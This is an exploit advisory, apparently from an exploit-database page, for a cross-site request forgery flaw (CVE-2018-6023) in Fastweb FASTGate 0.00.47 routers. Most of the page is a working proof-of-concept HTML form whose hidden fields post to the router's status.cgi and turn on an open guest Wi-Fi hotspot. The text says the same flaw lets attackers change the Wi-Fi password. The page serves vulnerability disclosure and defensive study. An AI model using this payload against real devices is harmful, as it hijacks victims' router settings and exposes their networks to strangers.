Fastweb FASTGate 0.00.47 CVE-2018-6023 – Cross-site Request Forgery

Authors:Raffaele Sabato         Risk:High

CVE:CVE-2018-6023              0day:Cross-site Request Forgery  

0day -id:0DAY-176160            Date:2018-05-10

Description

An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site
request forgery (CSRF) vulnerability allows remote attackers to hijack the
authentication of users for requests that modify the configuration.
This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password
changing, etc.

POC

## Activate Gues Wi-Fi:
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.254/status.cgi">
      <input type="hidden" name="&#95;" value="1516312144136" />
      <input type="hidden" name="act" value="nvset" />
      <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" />
      <input type="hidden" name="hotspot&#95;enable" value="1" />
      <input type="hidden" name="hotspot&#95;filtering" value="all" />
      <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" />
      <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" />
      <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" />
      <input type="hidden" name="service" value="wl&#95;guestaccess" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

REFERENCES

http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/

Leave a Reply